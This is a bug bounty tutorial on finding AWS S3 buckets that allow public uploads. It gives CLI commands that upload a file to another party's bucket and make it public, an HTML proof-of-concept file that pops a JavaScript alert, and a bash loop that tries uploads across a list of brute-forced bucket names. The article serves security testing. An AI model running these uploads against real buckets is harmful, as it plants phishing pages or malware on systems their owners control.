Testing for unauthorized file uploads on misconfigured AWS S3 buckets


alph4byt3

When I first started learning about bug bounty hunting, the first resource I used was Web Hacking 101 by Peter Yaworski. One of the bugs mentioned was a misconfigured AWS S3 bucket that allowed anyone to upload their own files to a ‘bucket’ they did not own. This fascinated me because it seemed to involve hardly any effort, and as I searched through different companies over the months, I was surprised at the number of them that use AWS S3. In this article, I’d like to share ways in which one could test for such misconfigurations.

Let’s start off by understanding what S3 is. Amazon Simple Storage Service (S3) is a service offered by AWS that provides object storage through a web service interface or a command-line interface. Objects such as files can be stored in ‘buckets’. Most of the time, these buckets are used to keep files such as images, audio files or JavaScript files, depending on the need, but another great use case is static website hosting.

When creating a bucket, users are given the ability to name it; a bucket can be named anything as long as the name does not already exist, since bucket names are globally unique.

Creating a bucket

Users can then set different permissions on the entire bucket or on individual objects within it using an access control list (ACL).

Setting access control permissions

As I’ve mentioned, buckets can also be set up as static websites. By providing an index page, a bucket can host a static site, and users can link domain names that they own to give the site a custom domain. If a domain name is not used, buckets can be accessed from a browser with the URL format http://bucketname.s3.amazonaws.com

The AWS CLI

A cool thing about AWS is that it also has a command-line tool that allows you to interact with its services, S3 being one of them. The tool can be used to upload objects to a bucket, change their permissions, delete them and more. This makes working from the command line easy and efficient if GUIs are not your thing.
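For a quick taste of what that looks like, assuming a bucket named my-bucket that you own (both the bucket and file names here are just examples):

aws s3 cp report.pdf s3://my-bucket/   # upload an object
aws s3 ls s3://my-bucket/              # list the bucket’s contents
aws s3 rm s3://my-bucket/report.pdf    # delete the object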

What can go wrong?

Now that we understand a little about S3, let’s talk about what can go wrong. As mentioned, buckets can be created with different sets of permissions, and one of the more dangerous configurations is a bucket that is publicly writable. This means that any user who does not own the bucket, whether anonymous or merely authenticated to AWS, can upload their own objects to it. Although it may sound like common sense to block all public write access, people do make mistakes, and therefore some buckets end up misconfigured with such permissions.

Misconfigured access

Amazon has several warnings about this in their documentation.

Please note that in my testing, I am an authorized AWS user (i.e. I have an AWS account with security credentials set up), and therefore the methodology used below will require an AWS account; more on this later.

One of the first things we’d want to do is find bucket names. Buckets can be named anything at all, so caution needs to be taken: even if the name of a bucket is related to a company, it does not mean that the company owns that bucket.

There are several ways to do this:

1. Manually finding buckets

While browsing through company assets, chances are you will find something like this…

The bucket above, which I created, has public read access; however, the majority of the time, buckets will be inaccessible, such as the one below.

These are buckets that are properly configured to block all public read access (though this does not necessarily mean that write access has been blocked as well). Inaccessible buckets found through a domain name are hard to exploit because we do not know the bucket name, but there are cases where the bucket name is the same as the domain name, so it’s worth a try, as in the sketch below.
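For example, if an asset is served from files.example.com (a hypothetical domain), you could guess that the bucket shares the name and probe it directly:

aws s3 ls s3://files.example.com   # a listing or AccessDenied suggests the bucket exists; NoSuchBucket means the guess was wrong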

2. Nuclei

Everyone’s favorite tool, Nuclei, by the team over at @ProjectDiscovery, can do this for you: supply it a list of URLs along with a template that detects S3.
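A minimal sketch of such a run; the template path here is illustrative, as exact template names vary between nuclei-templates releases:

nuclei -l urls.txt -t technologies/s3-detect.yaml -o s3-hits.txt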

3. Brute-forcing names

This is the method I use the most, and the one with the highest success rate.

CloudBrute by @0xsha

CloudBrute is an amazing tool that can detect S3 buckets by brute-forcing names from a given wordlist and outputting them to a file.
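A sketch of a typical invocation against a hypothetical example.com; the flag names here are from memory and may differ between versions, so check cloudbrute --help:

cloudbrute -d example.com -k example -m storage -w wordlist.txt -o found-buckets.txt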

Now that we’ve got a list of bucket names, let’s get down to testing. One of the first requirements is installing and configuring the AWS CLI (so that we may upload files from our machine to an S3 bucket).

On Debian-based Linux distributions, a simple:

sudo apt install awscli

will do

To configure the tool, you’ll need to first create an AWS account and generate access credentials; please see https://docs.aws.amazon.com/general/latest/gr/aws-sec-cred-types.html

Take note of your secret key once created, as you will not be able to view it again. Once you have both your access key and secret key, type ‘aws configure’ and fill in the information required. Once that is set, we can start testing.
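The prompts look roughly like this (the values shown are placeholders, not real credentials):

$ aws configure
AWS Access Key ID [None]: AKIAXXXXXXXXXXXXXXXX
AWS Secret Access Key [None]: ****************************************
Default region name [None]: us-east-1
Default output format [None]: json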

Commands

To upload a file, a command like the following is used (bucketname stands in for the target bucket and poc-file.txt for your test file):
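aws s3 cp poc-file.txt s3://bucketname/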

If the feedback returned is:

upload failed: ./poc-file.txt to s3://bucketname/poc-file.txt An error occurred (AccessDenied) when calling the PutObject operation: Access Denied

Then the bucket is properly configured and not vulnerable.

A successful upload produces output along these lines:
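upload: ./poc-file.txt to s3://bucketname/poc-file.txt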

If you receive this message, then your file was successfully uploaded and should now appear in the bucket.

In order to view this newly uploaded file, we’ll have to change its read permissions so that everyone can access it. To do this, use a command like the one below, which sets the object’s ACL through the s3api subcommand:
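aws s3api put-object-acl --bucket bucketname --key poc-file.txt --acl public-read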

The command should return nothing, which means it was successful. Now, when we browse to https://bucketname.s3.amazonaws.com/poc-file.txt, we should be able to view the file.

For example, a simple proof-of-concept HTML file that pops a JavaScript alert box.
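If you want to reproduce something similar, a minimal PoC file can be created like this (the file name and alert text are arbitrary):

cat > poc-file.html <<'EOF'
<!DOCTYPE html>
<html>
  <body>
    <script>alert('PoC: this bucket allows public uploads');</script>
  </body>
</html>
EOF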

Can we automate this?

Yes! Of course we can. I mean, why wouldn’t you? There’s a good chance you will have over a hundred bucket names in your list, and surely you wouldn’t want to manually type the command for every name.

I’m no programming expert but I was able to put together a straightforward bash script that will iterate through a list of names and try each one.

The script can be found here https://github.com/alph4byt3/bucketUploader
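The core idea is a loop like the following; this is a minimal sketch of the approach, not the exact script from the repository:

#!/usr/bin/env bash
# Usage: ./bucketUploader.sh buckets.txt poc-file.txt
# Attempts to upload the given file to every bucket name in the list.
while read -r bucket; do
  if aws s3 cp "$2" "s3://$bucket/" 2>/dev/null; then
    echo "[+] Writable bucket found: $bucket"
  else
    echo "[-] Upload denied: $bucket"
  fi
done < "$1"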

Please, be my guest to make it better.

Impact

What can we do with such a vulnerability? Well, as I’ve shown in the example, I uploaded a proof-of-concept HTML file that alerts the user via JavaScript.

Malicious actors can create and upload fake login forms, phishing pages or malware, or they can upload a lot of garbage files that cost the company money (S3 storage is not always free).

The impact of this kind of bug depends on the company, but it usually falls between medium and high severity.

Ending

This is the first article I’ve ever written about bug hunting, so I hope that the information here helps in some way or another. If you’ve made it this far, thank you.

Credit goes out to all that are mentioned.

Find me on Twitter https://twitter.com/alph4byt3

Regards
